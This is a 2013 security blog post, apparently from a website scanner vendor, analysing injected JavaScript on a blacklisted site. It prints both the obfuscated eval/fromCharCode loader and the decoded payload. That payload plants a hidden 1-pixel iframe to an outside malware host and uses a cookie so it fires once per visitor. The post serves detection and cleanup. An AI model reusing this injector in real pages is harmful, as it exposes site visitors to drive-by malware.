Thursday, August 8, 2013

Blacklisted website redirects visitors to malware distributor

Blacklisted website hosts JavaScript code generating hidden iframe to load content from compromised website

Background

Online Website Malware Scanner has identified malicious JavaScript code injection in the scanned website. Such malicious obfuscated JavaScript code is used to build malicious iframe invisible to the website user and which downloads content from remote malware distributor.

This infected website hosts suspicious JavaScript code injected in files. The website itself is already blacklisted by Google. The hidden iframe loads content from the remote site that is appeared distributing malware. 

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources(websites).

Website malware scanner report

Submission date: Tue Aug 6 18:06:08 2013
Infected website's files: 2
Website malware scan report link: Sitescan report link

Blacklisted website scan report
Quttera website malware scanner. Website scan report overview screenshot.


Threat dump:

Quttera online website malware scanner detected suspicious JavaScript
Potentially Suspicious index.html file. Quttera online website malware scanner detected suspicious JavaScript

Malware entry


Malware entry details.

Beautified script

  1. = "doc" + "ument";
  2. try {
  3.     ++document.body
  4. } catch (q) {
  5.     aa = function (ff) {
  6.         for (= 0; i < z.length; i++) {
  7.             za += String[ff](e(+ (z[i])) - 12);
  8.         }
  9.     };
  10. };
  11. ps = "split";
  12. = (eval);
  13. = "0x";
  14. = 0;
  15. = "y";
  16. try {;
  17. } catch (zz) {
  18.     a = 1
  19. }
  20. if (!a) {
  21.     try {
  22.         ++e(d)["bod" + z]
  23.     } catch (q) {
  24.         a2 = "_";
  25.     }
  26.     z ="2c_72_81_7a_6f_80_75_7b_7a_2c_86_86_86_72_72_72_34_35_2c_87_19_16_2c_82_6d_7e_2c_76_6d_70_7e_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7e_71_6d_80_71_51_78_71_79_71_7a_80_34_33_75_72_7e_6d_79_71_33_35_47_19_16_19_16_2c_76_6d_70_7e_3a_7f_7e_6f_2c_49_2c_33_74_80_80_7c_46_3b_3b_6f_6d_72_71_78_81_79_3a_7e_81_3b_80_79_7c_3b_40_42_7a_7d_75_86_78_7f_3a_7c_74_7c_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_7c_7b_7f_75_80_75_7b_7a_2c_49_2c_33_6d_6e_7f_7b_78_81_80_71_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_6e_7b_7e_70_71_7e_2c_49_2c_33_3c_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_74_71_75_73_74_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_83_75_70_80_74_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_78_71_72_80_2c_49_2c_33_3d_7c_84_33_47_19_16_2c_76_6d_70_7e_3a_7f_80_85_78_71_3a_80_7b_7c_2c_49_2c_33_3d_7c_84_33_47_19_16_19_16_2c_75_72_2c_34_2d_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_76_6d_70_7e_33_35_35_2c_87_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_83_7e_75_80_71_34_33_48_70_75_82_2c_75_70_49_68_33_76_6d_70_7e_68_33_4a_48_3b_70_75_82_4a_33_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_73_71_80_51_78_71_79_71_7a_80_4e_85_55_70_34_33_76_6d_70_7e_33_35_3a_6d_7c_7c_71_7a_70_4f_74_75_78_70_34_76_6d_70_7e_35_47_19_16_2c_89_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_5f_71_80_4f_7b_7b_77_75_71_34_6f_7b_7b_77_75_71_5a_6d_79_71_38_6f_7b_7b_77_75_71_62_6d_78_81_71_38_7a_50_6d_85_7f_38_7c_6d_80_74_35_2c_87_19_16_2c_82_6d_7e_2c_80_7b_70_6d_85_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_82_6d_7e_2c_71_84_7c_75_7e_71_2c_49_2c_7a_71_83_2c_50_6d_80_71_34_35_47_19_16_2c_75_72_2c_34_7a_50_6d_85_7f_49_49_7a_81_78_78_2c_88_88_2c_7a_50_6d_85_7f_49_49_3c_35_2c_7a_50_6d_85_7f_49_3d_47_19_16_2c_71_84_7c_75_7e_71_3a_7f_71_80_60_75_79_71_34_80_7b_70_6d_85_3a_73_71_80_60_75_79_71_34_35_2c_37_2c_3f_42_3c_3c_3c_3c_3c_36_3e_40_36_7a_50_6d_85_7f_35_47_19_16_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_2c_49_2c_6f_7b_7b_77_75_71_5a_6d_79_71_37_2e_49_2e_37_71_7f_6f_6d_7c_71_34_6f_7b_7b_77_75_71_62_6d_78_81_71_35_19_16_2c_37_2c_2e_47_71_84_7c_75_7e_71_7f_49_2e_2c_37_2c_71_84_7c_75_7e_71_3a_80_7b_53_59_60_5f_80_7e_75_7a_73_34_35_2c_37_2c_34_34_7c_6d_80_74_35_2c_4b_2c_2e_47_2c_7c_6d_80_74_49_2e_2c_37_2c_7c_6d_80_74_2c_46_2c_2e_2e_35_47_19_16_89_19_16_72_81_7a_6f_80_75_7b_7a_2c_53_71_80_4f_7b_7b_77_75_71_34_2c_7a_6d_79_71_2c_35_2c_87_19_16_2c_82_6d_7e_2c_7f_80_6d_7e_80_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_7a_6d_79_71_2c_37_2c_2e_49_2e_2c_35_47_19_16_2c_82_6d_7e_2c_78_71_7a_2c_49_2c_7f_80_6d_7e_80_2c_37_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_37_2c_3d_47_19_16_2c_75_72_2c_34_2c_34_2c_2d_7f_80_6d_7e_80_2c_35_2c_32_32_19_16_2c_34_2c_7a_6d_79_71_2c_2d_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_3c_38_2c_7a_6d_79_71_3a_78_71_7a_73_80_74_2c_35_2c_35_2c_35_19_16_2c_87_19_16_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_89_19_16_2c_75_72_2c_34_2c_7f_80_6d_7e_80_2c_49_49_2c_39_3d_2c_35_2c_7e_71_80_81_7e_7a_2c_7a_81_78_78_47_19_16_2c_82_6d_7e_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_75_7a_70_71_84_5b_72_34_2c_2e_47_2e_38_2c_78_71_7a_2c_35_47_19_16_2c_75_72_2c_34_2c_71_7a_70_2c_49_49_2c_39_3d_2c_35_2c_71_7a_70_2c_49_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_78_71_7a_73_80_74_47_19_16_2c_7e_71_80_81_7e_7a_2c_81_7a_71_7f_6f_6d_7c_71_34_2c_70_7b_6f_81_79_71_7a_80_3a_6f_7b_7b_77_75_71_3a_7f_81_6e_7f_80_7e_75_7a_73_34_2c_78_71_7a_38_2c_71_7a_70_2c_35_2c_35_47_19_16_89_19_16_75_72_2c_34_7a_6d_82_75_73_6d_80_7b_7e_3a_6f_7b_7b_77_75_71_51_7a_6d_6e_78_71_70_35_19_16_87_19_16_75_72_34_53_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_35_49_49_41_41_35_87_89_71_78_7f_71_87_5f_71_80_4f_7b_7b_77_75_71_34_33_82_75_7f_75_80_71_70_6b_81_7d_33_38_2c_33_41_41_33_38_2c_33_3d_33_38_2c_33_3b_33_35_47_19_16_19_16_86_86_86_72_72_72_34_35_47_19_16_89_19_16_89_19_16"[ps](a2);
  27.     za = "";
  28.     aa("fromCharCode");
  29.     zaz = za;
  30.     e(zaz);
  31. }

Malicious payload


Decoded payload generates hidden iframe to http://cafelum.ru/tmp/46nqizls.php

  1. function zzzfff() {
  2.  
  3.     var jadr = document.createElement('iframe');
  4.  
  5.  
  6.  
  7.     jadr.src = 'http://cafelum.ru/tmp/46nqizls.php';
  8.  
  9.     jadr.style.position = 'absolute';
  10.  
  11.     jadr.style.border = '0';
  12.  
  13.     jadr.style.height = '1px';
  14.  
  15.     jadr.style.width = '1px';
  16.  
  17.     jadr.style.left = '1px';
  18.  
  19.     jadr.style.top = '1px';
  20.  
  21.  
  22.  
  23.     if (!document.getElementById('jadr')) {
  24.  
  25.         document.write('<div id=\'jadr\'></div>');
  26.  
  27.         document.getElementById('jadr').appendChild(jadr);
  28.  
  29.     }
  30.  
  31. }
  32.  
  33. function SetCookie(cookieName, cookieValue, nDays, path) {
  34.  
  35.     var today = new Date();
  36.  
  37.     var expire = new Date();
  38.  
  39.     if (nDays == null || nDays == 0) nDays = 1;
  40.  
  41.     expire.setTime(today.getTime() + 3600000 * 24 * nDays);
  42.  
  43.     document.cookie = cookieName + "=" + escape(cookieValue)
  44.  
  45.     + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
  46.  
  47. }
  48.  
  49. function GetCookie(name) {
  50.  
  51.     var start = document.cookie.indexOf(name + "=");
  52.  
  53.     var len = start + name.length + 1;
  54.  
  55.     if ((!start) &&
  56.  
  57.         (name != document.cookie.substring(0, name.length)))
  58.  
  59.     {
  60.  
  61.         return null;
  62.  
  63.     }
  64.  
  65.     if (start == -1) return null;
  66.  
  67.     var end = document.cookie.indexOf(";", len);
  68.  
  69.     if (end == -1) end = document.cookie.length;
  70.  
  71.     return unescape(document.cookie.substring(len, end));
  72.  
  73. }
  74.  
  75. if (navigator.cookieEnabled)
  76.  
  77. {
  78.  
  79.     if (GetCookie('visited_uq') == 55) {} else {
  80.         SetCookie('visited_uq', '55', '1', '/');
  81.  
  82.  
  83.  
  84.         zzzfff();
  85.  
  86.     }
  87.  
  88. }

Similar payload analyzed in the Malware Attacking Unique Website Visitors Only post.

Blacklisting status


Both scanned website and the redirect URL are Suspicious on Google Safe Browsing.

Scanned website analysis by Google Safe Browsing
Scanned website analysis by Google Safe Browsing

Hidden iframe redirect URL analysis by Google Safe Browsing
Hidden iframe redirect URL analysis by Google Safe Browsing


Malware clean-up


Such malware is often hidden inside the JavaScript file. If you suspect that your website was infected by similar malware please use Website Anti-malware Monitoring for remediation assessment.